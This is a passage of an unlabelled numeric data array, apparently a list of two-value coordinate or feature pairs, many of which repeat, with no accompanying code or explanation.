[6.3210685917865375, 4.3368878948732315],
[8.091186464752749, 6.136296389022805],
[5.603685695983892, 3.2451075514789007],
[10.898829990027707, 4.394411988981465],
[7.466702255730219, 4.246506577865299],
[10.814899075379794, 4.388065524750964],
[8.0310976897579, 4.565308046256245],
[4.939032982959074, 2.8272859625441624],
[5.665576843540502, 3.3322218039932925],
[8.0310976897579, 4.565308046256245],
[5.603685695983892, 3.2451075514789007],
[10.898829990027707, 4.394411988981465],
[5.8339171963263325, 3.677542604399159],
[8.813658596800783, 4.40731941077611],
[10.814899075379794, 4.388065524750964],
[6.365395218692758, 3.981690481898278],
[4.939032982959074, 2.8272859625441624],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[4.037928442939495, 2.247534391934304],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[7.6940868267500635, 3.550772075193317],
[6.03354502067699, 2.1318518082449667],
[8.21144142645822, 3.37666183586836],
[6.883321149103081, 3.7013844629577264],
[5.199647262139352, 3.3998805870242608],
[4.939032982959074, 2.8272859625441624],
[9.928680899438294, 6.035107559394114],
[12.853507659807189, 5.785539998056296],
[8.870442861535144, 6.177832505416414],
[12.080015421555425, 5.049617522440796],
[10.2399295321238, 4.481189072402238],
[9.083403326029671, 4.36430118910945],
[9.466254501175204, 3.8184797117274356],
[8.091186464752749, 6.136296389022805],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.939032982959074, 2.8272859625441624],
[4.433117324180472, 1.9414418755023324],
[6.441820784103897, 1.8297149833490693],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[6.03354502067699, 2.1318518082449667],
[6.025832875175962, 3.7292527992755335],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[4.939032982959074, 2.8272859625441624],
[4.037928442939495, 2.247534391934304],
[7.382275307401952, 3.514762773783933],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[6.03354502067699, 2.1318518082449667],
[6.025832875175962, 3.7292527992755335],
[8.21144142645822, 3.37666183586836],
[5.132833382217747, 3.156111073426686],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[6.02640897943888, 3.916563880181475],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[7.176117324513632, 3.942691925460738],
[5.8339171963263325, 3.677542604399159],
[5.132833382217747, 3.156111073426686],
[4.939032982959074, 2.8272859625441624],
[17.15034588213487, 6.013297305587326],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.433117324180472, 1.9414418755023324],
[4.037928442939495, 2.247534391934304],
[6.441820784103897, 1.8297149833490693],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[6.03354502067699, 2.1318518082449667],
[6.025832875175962, 3.7292527992755335],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[5.057383822940272, 3.417585900052888],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[6.221065720140407, 1.8444794858743812],
[7.817292084856258, 3.0485450300896595],
[4.037928442939495, 2.247534391934304],
[3.1990871251820026, 3.6130256259877207],
[6.441820784103897, 1.8297149833490693],
[6.03354502067699, 2.1318518082449667],
[4.433117324180472, 1.9414418755023324],
[3.8285647411742985, 1.878975582108213],
[7.060678719911859, 3.618460185670135],
[6.384641291520963, 1.736955799614506],
[3.5385747281300692, 1.9677218437260573],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.433117324180472, 1.9414418755023324],
[4.037928442939495, 2.247534391934304],
[6.441820784103897, 1.8297149833490693],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[4.939032982959074, 2.8272859625441624],
[3.5385747281300692, 1.9677218437260573],
[8.670163964741999, 4.633257877869705],
[9.359806276911984, 4.391696939018151],
[8.537576561493351, 3.80529051679574],
[7.852704754906792, 4.343768201209051],
[11.412256391365355, 3.7206871339538865],
[12.107676347618414, 3.5085731094097685],
[5.057383822940272, 3.417585900052888],
[6.221065720140407, 1.8444794858743812],
[7.817292084856258, 3.0485450300896595],
[4.037928442939495, 2.247534391934304],
[3.1990871251820026, 3.6130256259877207],
[6.441820784103897, 1.8297149833490693],
[6.018242339961669, 2.455006569825223],
[6.03354502067699, 2.1318518082449667],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.060678719911859, 3.618460185670135],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[4.433117324180472, 1.9414418755023324],
[4.037928442939495, 2.247534391934304],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[6.025832875175962, 3.7292527992755335],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.139919695904992, 6.091186677843476],
[6.27221015926113, 4.480818515169627],
[5.199647262139352, 3.3998805870242608],
[3.5385747281300692, 1.9677218437260573],
[4.037928442939495, 2.247534391934304],
[7.382275307401952, 3.514762773783933],
[7.416175074176887, 3.469293325351635],
[6.025832875175962, 3.7292527992755335],
[8.21144142645822, 3.37666183586836],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[9.313523271207726, 7.409010602010248],
[7.930783504041922, 6.31551486280533],
[6.025832875175962, 3.7292527992755335],
[6.27221015926113, 4.480818515169627],
[4.712625210940835, 2.9014826657868547],
[17.15034588213487, 6.013297305587326],
[14.580862047474623, 6.075320512048607],
[16.602567350873077, 8.029388325380623],
[13.810979490746323, 5.502056760777586],
[15.499752594717432, 8.228672599384055],
[12.184675001512177, 5.239194812480995],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.416175074176887, 3.469293325351635],
[6.025832875175962, 3.7292527992755335],
[7.139919695904992, 6.091186677843476],
[4.712625210940835, 2.9014826657868547],
[10.898829990027707, 4.394411988981465],
[8.670163964741999, 4.633257877869705],
[9.359806276911984, 4.391696939018151],
[12.107676347618414, 3.5085731094097685],
[11.508128595950659, 3.5851980362589004],
[6.018242339961669, 2.455006569825223],
[7.817292084856258, 3.0485450300896595],
[3.1990871251820026, 3.6130256259877207],
[2.6157741915651846, 3.1088022135528464],
[5.425993469713776, 2.3674151211798176],
[4.433117324180472, 1.9414418755023324],
[4.712625210940835, 2.9014826657868547],
[4.459870001832672, 1.7285677118659897],
[5.057383822940272, 3.417585900052888],
[5.483181079034119, 3.3932092599533696],
[7.060678719911859, 3.618460185670135],
[3.5385747281300692, 1.9677218437260573],
[6.018242339961669, 2.455006569825223],
[4.433117324180472, 1.9414418755023324],
[7.648743254380252, 3.257370873095939],
[2.6157741915651846, 3.1088022135528464],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[3.6755430287090185, 2.4658558409523934],
[5.425993469713776, 2.3674151211798176],
[5.483181079034119, 3.3932092599533696],
[7.060678719911859, 3.618460185670135],
[7.817292084856258, 3.0485450300896595],
[7.627730488281269, 3.536913242480221],
[7.382275307401952, 3.514762773783933],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[4.037928442939495, 2.247534391934304],
[7.6940868267500635, 3.550772075193317],
[7.416175074176887, 3.469293325351635],
[7.139919695904992, 6.091186677843476],
[6.27221015926113, 4.480818515169627],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[7.930783504041922, 6.31551486280533],
[6.025832875175962, 3.7292527992755335],
[5.425993469713776, 2.3674151211798176],
[4.433117324180472, 1.9414418755023324],
[4.712625210940835, 2.9014826657868547],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.139919695904992, 6.091186677843476],
[6.27221015926113, 4.480818515169627],
[6.425951539197719, 3.4605904466592117],
[3.5385747281300692, 1.9677218437260573],
[7.627730488281269, 3.536913242480221],
[5.665576843540502, 3.3322218039932925],
[5.603685695983892, 3.2451075514789007],
[7.6940868267500635, 3.550772075193317],
[8.21144142645822, 3.37666183586836],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[5.199647262139352, 3.3998805870242608],
[4.939032982959074, 2.8272859625441624],
[8.206988166321013, 2.7538312138050416],
[3.6755430287090185, 2.4658558409523934],
[7.648743254380252, 3.257370873095939],
[3.1990871251820026, 3.6130256259877207],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[5.483181079034119, 3.3932092599533696],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.583569459571693, 2.9678320131795166],
[5.425993469713776, 2.3674151211798176],
[6.073933436884495, 2.5749648755014114],
[7.060678719911859, 3.618460185670135],
[8.870442861535144, 6.177832505416414],
[6.476501957957835, 4.8132321274246],
[8.091186464752749, 6.136296389022805],
[6.3210685917865375, 4.3368878948732315],
[6.079090279988409, 4.148184844804541],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[3.1990871251820026, 3.6130256259877207],
[7.930783504041922, 6.31551486280533],
[2.6157741915651846, 3.1088022135528464],
[5.425993469713776, 2.3674151211798176],
[4.433117324180472, 1.9414418755023324],
[4.712625210940835, 2.9014826657868547],
[3.8285647411742985, 1.878975582108213],
[5.483181079034119, 3.3932092599533696],
[6.425951539197719, 3.4605904466592117],
[3.5385747281300692, 1.9677218437260573],
[8.537576561493351, 3.80529051679574],
[7.852704754906792, 4.343768201209051],
[9.359806276911984, 4.391696939018151],
[11.412256391365355, 3.7206871339538865],
[11.508128595950659, 3.5851980362589004],
[6.018242339961669, 2.455006569825223],
[7.817292084856258, 3.0485450300896595],
[7.648743254380252, 3.257370873095939],
[3.1990871251820026, 3.6130256259877207],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[3.8285647411742985, 1.878975582108213],
[2.6157741915651846, 3.1088022135528464],
[3.6755430287090185, 2.4658558409523934],
[4.433117324180472, 1.9414418755023324],
[8.206988166321013, 2.7538312138050416],
[6.024029708789503, 2.7765971408513765],
[6.805877015325792, 1.5925707515038552],
[2.6157741915651846, 3.1088022135528464],
[7.648743254380252, 3.257370873095939],
[3.1990871251820026, 3.6130256259877207],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[4.765886863174591, 2.2246421206661733],
[7.583569459571693, 2.9678320131795166],
[5.435836143120371, 2.8043480606961375],
[6.073933436884495, 2.5749648755014114],
[5.483181079034119, 3.3932092599533696],
[7.060678719911859, 3.618460185670135],
[6.018242339961669, 2.455006569825223],
[7.817292084856258, 3.0485450300896595],
[4.037928442939495, 2.247534391934304],
[6.441820784103897, 1.8297149833490693],
[6.03354502067699, 2.1318518082449667],
[4.433117324180472, 1.9414418755023324],
[6.384641291520963, 1.736955799614506],
[3.5385747281300692, 1.9677218437260573],
[4.037928442939495, 2.247534391934304],
[7.6940868267500635, 3.550772075193317],
[6.025832875175962, 3.7292527992755335],
[8.21144142645822, 3.37666183586836],
[6.27221015926113, 4.480818515169627],
[5.199647262139352, 3.3998805870242608],
[4.712625210940835, 2.9014826657868547],
[3.5385747281300692, 1.9677218437260573],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[9.313523271207726, 7.409010602010248],
[5.425993469713776, 2.3674151211798176],
[4.459870001832672, 1.7285677118659897],
[7.139919695904992, 6.091186677843476],
[6.425951539197719, 3.4605904466592117],
[5.057383822940272, 3.417585900052888],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[9.313523271207726, 7.409010602010248],
[7.930783504041922, 6.31551486280533],
[5.425993469713776, 2.3674151211798176],
[4.712625210940835, 2.9014826657868547],
[4.459870001832672, 1.7285677118659897],
[7.139919695904992, 6.091186677843476],
[6.27221015926113, 4.480818515169627],
[6.425951539197719, 3.4605904466592117],
[6.025832875175962, 3.7292527992755335],
[15.006366271051672, 4.232282823070333],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[6.805877015325792, 1.5925707515038552],
[2.6157741915651846, 3.1088022135528464],
[7.648743254380252, 3.257370873095939],
[15.272869558340066, 5.179633920566634],
[3.1990871251820026, 3.6130256259877207],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[7.060678719911859, 3.618460185670135],
[9.436127302593512, 5.541398982964392],
[4.765886863174591, 2.2246421206661733],
[6.024029708789503, 2.7765971408513765],
[6.073933436884495, 2.5749648755014114],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[7.42290814377523, 2.4182881151332105],
[6.633316773597083, 2.460443387674774],
[3.1990871251820026, 3.6130256259877207],
[7.930783504041922, 6.31551486280533],
[2.6157741915651846, 3.1088022135528464],
[8.09611116766466, 2.3148350927200396],
[5.926847062929005, 2.550077789090704],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[6.425951539197719, 3.4605904466592117],
[8.206988166321013, 2.7538312138050416],
[7.42290814377523, 2.4182881151332105],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[3.1990871251820026, 3.6130256259877207],
[2.6157741915651846, 3.1088022135528464],
[5.425993469713776, 2.3674151211798176],
[8.09611116766466, 2.3148350927200396],
[3.8285647411742985, 1.878975582108213],
[4.459870001832672, 1.7285677118659897],
[7.583569459571693, 2.9678320131795166],
[6.073933436884495, 2.5749648755014114],
[3.6755430287090185, 2.4658558409523934],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[8.0310976897579, 4.565308046256245],
[11.412256391365355, 3.7206871339538865],
[10.814899075379794, 4.388065524750964],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.433117324180472, 1.9414418755023324],
[4.037928442939495, 2.247534391934304],
[6.03354502067699, 2.1318518082449667],
[6.384641291520963, 1.736955799614506],
[3.5385747281300692, 1.9677218437260573],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[7.42290814377523, 2.4182881151332105],
[6.633316773597083, 2.460443387674774],
[7.930783504041922, 6.31551486280533],
[5.425993469713776, 2.3674151211798176],
[8.09611116766466, 2.3148350927200396],
[4.459870001832672, 1.7285677118659897],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[6.425951539197719, 3.4605904466592117],
[15.006366271051672, 4.232282823070333],
[6.024029708789503, 2.7765971408513765],
[3.6755430287090185, 2.4658558409523934],
[6.805877015325792, 1.5925707515038552],
[15.272869558340066, 5.179633920566634],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[2.6640740853075005, 2.3912359557692726],
[3.230417925582914, 3.0172709078239617],
[9.436127302593512, 5.541398982964392],
[4.765886863174591, 2.2246421206661733],
[4.13832415287115, 3.791493370103742],
[6.073933436884495, 2.5749648755014114],
[7.785473193141325, 4.667062798186051],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[7.469449854326634, 5.159645256391554],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[7.930783504041922, 6.31551486280533],
[5.425993469713776, 2.3674151211798176],
[4.459870001832672, 1.7285677118659897],
[8.206988166321013, 2.7538312138050416],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[6.805877015325792, 1.5925707515038552],
[2.6157741915651846, 3.1088022135528464],
[4.8656085177216335, 3.507236448349241],
[10.026366613585727, 1.8960365443859055],
[8.298445566203704, 1.4267451115017629],
[7.583569459571693, 2.9678320131795166],
[4.765886863174591, 2.2246421206661733],
[6.024029708789503, 2.7765971408513765],
[5.483181079034119, 3.3932092599533696],
[8.206988166321013, 2.7538312138050416],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[8.915211259432512, 0.9889547601376892],
[4.8656085177216335, 3.507236448349241],
[10.026366613585727, 1.8960365443859055],
[8.298445566203704, 1.4267451115017629],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[8.426879836837694, 2.0831024928635116],
[4.765886863174591, 2.2246421206661733],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[6.073933436884495, 2.5749648755014114],
[9.052150960537846, 0.7674448804270357],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[8.79909367536444, 4.432608366014386],
[4.8656085177216335, 3.507236448349241],
[8.298445566203704, 1.4267451115017629],
[3.230417925582914, 3.0172709078239617],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[4.765886863174591, 2.2246421206661733],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[6.073933436884495, 2.5749648755014114],
[9.052150960537846, 0.7674448804270357],
[6.805877015325792, 1.5925707515038552],
[8.206988166321013, 2.7538312138050416],
[7.42290814377523, 2.4182881151332105],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[2.6157741915651846, 3.1088022135528464],
[5.483181079034119, 3.3932092599533696],
[10.026366613585727, 1.8960365443859055],
[8.09611116766466, 2.3148350927200396],
[3.6755430287090185, 2.4658558409523934],
[5.425993469713776, 2.3674151211798176],
[6.073933436884495, 2.5749648755014114],
[9.436127302593512, 5.541398982964392],
[6.024029708789503, 2.7765971408513765],
[5.435836143120371, 2.8043480606961375],
[6.805877015325792, 1.5925707515038552],
[8.816728351491637, 5.517350427765949],
[4.13832415287115, 3.791493370103742],
[2.6640740853075005, 2.3912359557692726],
[3.230417925582914, 3.0172709078239617],
[3.6755430287090185, 2.4658558409523934],
[4.8656085177216335, 3.507236448349241],
[6.073933436884495, 2.5749648755014114],
[7.785473193141325, 4.667062798186051],
[10.898829990027707, 4.394411988981465],
[8.813658596800783, 4.40731941077611],
[7.466702255730219, 4.246506577865299],
[8.0310976897579, 4.565308046256245],
[12.080015421555425, 5.049617522440796],
[17.40712445864718, 6.0786148727775835],
[3.6755430287090185, 2.4658558409523934],
[6.805877015325792, 1.5925707515038552],
[8.09611116766466, 2.3148350927200396],
[2.6157741915651846, 3.1088022135528464],
[6.073933436884495, 2.5749648755014114],
[10.026366613585727, 1.8960365443859055],
[8.298445566203704, 1.4267451115017629],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[9.436127302593512, 5.541398982964392],
[6.024029708789503, 2.7765971408513765],
[4.13832415287115, 3.791493370103742],
[2.6640740853075005, 2.3912359557692726],
[4.765886863174591, 2.2246421206661733],
[5.435836143120371, 2.8043480606961375],
[8.816728351491637, 5.517350427765949],
[7.785473193141325, 4.667062798186051],
[7.42290814377523, 2.4182881151332105],
[5.926847062929005, 2.550077789090704],
[5.425993469713776, 2.3674151211798176],
[8.09611116766466, 2.3148350927200396],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[6.425951539197719, 3.4605904466592117],
[5.057383822940272, 3.417585900052888],
[6.981801980351727, 5.790295382573812],
[5.926847062929005, 2.550077789090704],
[9.313523271207726, 7.409010602010248],
[7.930783504041922, 6.31551486280533],
[5.425993469713776, 2.3674151211798176],
[4.459870001832672, 1.7285677118659897],
[6.425951539197719, 3.4605904466592117],
[17.831733344604118, 5.601097356442306],
[8.79909367536444, 4.432608366014386],
[6.805877015325792, 1.5925707515038552],
[8.915211259432512, 0.9889547601376892],
[8.298445566203704, 1.4267451115017629],
[9.052150960537846, 0.7674448804270357],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[8.426879836837694, 2.0831024928635116],
[6.024029708789503, 2.7765971408513765],
[8.816728351491637, 5.517350427765949],
[16.27085066460655, 7.219369562609158],
[4.13832415287115, 3.791493370103742],
[9.436127302593512, 5.541398982964392],
[4.6484348578469525, 4.498128244166764],
[3.230417925582914, 3.0172709078239617],
[4.765886863174591, 2.2246421206661733],
[5.435836143120371, 2.8043480606961375],
[7.785473193141325, 4.667062798186051],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[5.425993469713776, 2.3674151211798176],
[8.09611116766466, 2.3148350927200396],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[15.006366271051672, 4.232282823070333],
[5.435836143120371, 2.8043480606961375],
[15.272869558340066, 5.179633920566634],
[11.599493458855028, 4.6319068463010415],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[2.6640740853075005, 2.3912359557692726],
[3.230417925582914, 3.0172709078239617],
[4.765886863174591, 2.2246421206661733],
[4.13832415287115, 3.791493370103742],
[7.785473193141325, 4.667062798186051],
[8.206988166321013, 2.7538312138050416],
[7.42290814377523, 2.4182881151332105],
[5.926847062929005, 2.550077789090704],
[6.633316773597083, 2.460443387674774],
[5.425993469713776, 2.3674151211798176],
[10.026366613585727, 1.8960365443859055],
[7.583569459571693, 2.9678320131795166],
[5.483181079034119, 3.3932092599533696],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[6.805877015325792, 1.5925707515038552],
[8.298445566203704, 1.4267451115017629],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[8.206988166321013, 2.7538312138050416],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[10.026366613585727, 1.8960365443859055],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[6.073933436884495, 2.5749648755014114],
[9.052150960537846, 0.7674448804270357],
[6.805877015325792, 1.5925707515038552],
[2.6640740853075005, 2.3912359557692726],
[15.272869558340066, 5.179633920566634],
[11.599493458855028, 4.6319068463010415],
[7.366786430174513, 6.428369989001501],
[4.13832415287115, 3.791493370103742],
[9.436127302593512, 5.541398982964392],
[10.868473100078905, 6.500681652985371],
[4.6484348578469525, 4.498128244166764],
[3.230417925582914, 3.0172709078239617],
[4.765886863174591, 2.2246421206661733],
[5.435836143120371, 2.8043480606961375],
[3.230417925582914, 3.0172709078239617],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[8.298445566203704, 1.4267451115017629],
[9.052150960537846, 0.7674448804270357],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[4.765886863174591, 2.2246421206661733],
[9.782841374634526, 6.436511752429161],
[16.27085066460655, 7.219369562609158],
[6.805877015325792, 1.5925707515038552],
[17.831733344604118, 5.601097356442306],
[6.024029708789503, 2.7765971408513765],
[6.805877015325792, 1.5925707515038552],
[8.915211259432512, 0.9889547601376892],
[8.75996171977272, 2.4613800757137327],
[9.830856760443089, 3.168670142931533],
[8.298445566203704, 1.4267451115017629],
[9.052150960537846, 0.7674448804270357],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[8.426879836837694, 2.0831024928635116],
[10.765350147835402, 4.26355033264317],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[16.27085066460655, 7.219369562609158],
[5.665576843540502, 3.3322218039932925],
[5.603685695983892, 3.2451075514789007],
[7.382275307401952, 3.514762773783933],
[7.176117324513632, 3.942691925460738],
[8.21144142645822, 3.37666183586836],
[6.883321149103081, 3.7013844629577264],
[5.132833382217747, 3.156111073426686],
[4.939032982959074, 2.8272859625441624],
[6.024029708789503, 2.7765971408513765],
[8.79909367536444, 4.432608366014386],
[11.646036843330032, 5.28959128564458],
[8.75996171977272, 2.4613800757137327],
[9.830856760443089, 3.168670142931533],
[8.298445566203704, 1.4267451115017629],
[8.915211259432512, 0.9889547601376892],
[10.765350147835402, 4.26355033264317],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[9.052150960537846, 0.7674448804270357],
[6.805877015325792, 1.5925707515038552],
[9.782841374634526, 6.436511752429161],
[6.805877015325792, 1.5925707515038552],
[8.75996171977272, 2.4613800757137327],
[8.298445566203704, 1.4267451115017629],
[8.79909367536444, 4.432608366014386],
[8.426879836837694, 2.0831024928635116],
[6.024029708789503, 2.7765971408513765],
[8.816728351491637, 5.517350427765949],
[9.052150960537846, 0.7674448804270357],
[17.831733344604118, 5.601097356442306],
[10.352903816466064, 5.4329619694952],
[8.75996171977272, 2.4613800757137327],
[12.607577814121331, 6.654053135290553],
[10.218332769042606, 4.755288786393186],
[9.830856760443089, 3.168670142931533],
[8.79909367536444, 4.432608366014386],
[14.651849458814455, 6.156396527676787],
[8.426879836837694, 2.0831024928635116],
[10.765350147835402, 4.26355033264317],
[9.782841374634526, 6.436511752429161],
[16.27085066460655, 7.219369562609158],
[8.206988166321013, 2.7538312138050416],
[6.805877015325792, 1.5925707515038552],
[8.09611116766466, 2.3148350927200396],
[8.298445566203704, 1.4267451115017629],
[7.583569459571693, 2.9678320131795166],
[6.073933436884495, 2.5749648755014114],
[17.40712445864718, 6.0786148727775835],
[13.68779991816646, 7.969365452444415],
[12.607577814121331, 6.654053135290553],
[10.218332769042606, 4.755288786393186],
[9.70851317614466, 6.764568760710533],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[10.765350147835402, 4.26355033264317],
[9.228222681876002, 4.707914178930707],
[15.006366271051672, 4.232282823070333],
[7.648743254380252, 3.257370873095939],
[15.272869558340066, 5.179633920566634],
[3.1990871251820026, 3.6130256259877207],
[12.648689092385144, 4.264422651010618],
[2.6157741915651846, 3.1088022135528464],
[4.8656085177216335, 3.507236448349241],
[9.436127302593512, 5.541398982964392],
[12.511000378851987, 3.547264743632041],
[5.435836143120371, 2.8043480606961375],
[3.6755430287090185, 2.4658558409523934],
[7.060678719911859, 3.618460185670135],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[11.052943486906425, 4.056670488652025],
[12.607577814121331, 6.654053135290553],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[10.352903816466064, 5.4329619694952],
[6.925060823285094, 3.9322925779230595],
[12.390006549779804, 2.8565142569979605],
[9.228222681876002, 4.707914178930707],
[9.436127302593512, 5.541398982964392],
[15.272869558340066, 5.179633920566634],
[7.366786430174513, 6.428369989001501],
[4.13832415287115, 3.791493370103742],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[4.6484348578469525, 4.498128244166764],
[7.785473193141325, 4.667062798186051],
[15.006366271051672, 4.232282823070333],
[7.648743254380252, 3.257370873095939],
[15.272869558340066, 5.179633920566634],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[9.436127302593512, 5.541398982964392],
[12.511000378851987, 3.547264743632041],
[5.435836143120371, 2.8043480606961375],
[11.646036843330032, 5.28959128564458],
[10.352903816466064, 5.4329619694952],
[8.75996171977272, 2.4613800757137327],
[12.607577814121331, 6.654053135290553],
[10.218332769042606, 4.755288786393186],
[9.830856760443089, 3.168670142931533],
[8.79909367536444, 4.432608366014386],
[14.651849458814455, 6.156396527676787],
[8.426879836837694, 2.0831024928635116],
[8.79909367536444, 4.432608366014386],
[8.75996171977272, 2.4613800757137327],
[10.218332769042606, 4.755288786393186],
[11.646036843330032, 5.28959128564458],
[8.426879836837694, 2.0831024928635116],
[10.765350147835402, 4.26355033264317],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[10.352903816466064, 5.4329619694952],
[11.646036843330032, 5.28959128564458],
[13.68779991816646, 7.969365452444415],
[20.262525828886847, 4.38253198977739],
[12.607577814121331, 6.654053135290553],
[20.290752230806902, 5.971876134651779],
[10.218332769042606, 4.755288786393186],
[8.79909367536444, 4.432608366014386],
[10.765350147835402, 4.26355033264317],
[9.782841374634526, 6.436511752429161],
[16.27085066460655, 7.219369562609158],
[8.79909367536444, 4.432608366014386],
[11.646036843330032, 5.28959128564458],
[9.830856760443089, 3.168670142931533],
[8.915211259432512, 0.9889547601376892],
[8.426879836837694, 2.0831024928635116],
[10.765350147835402, 4.26355033264317],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[11.052943486906425, 4.056670488652025],
[12.390006549779804, 2.8565142569979605],
[8.991016655478452, 6.881447984734754],
[6.925060823285094, 3.9322925779230595],
[9.70851317614466, 6.764568760710533],
[6.318696553751853, 2.6493957765030025],
[9.228222681876002, 4.707914178930707],
[12.607577814121331, 6.654053135290553],
[10.352903816466064, 5.4329619694952],
[9.830856760443089, 3.168670142931533],
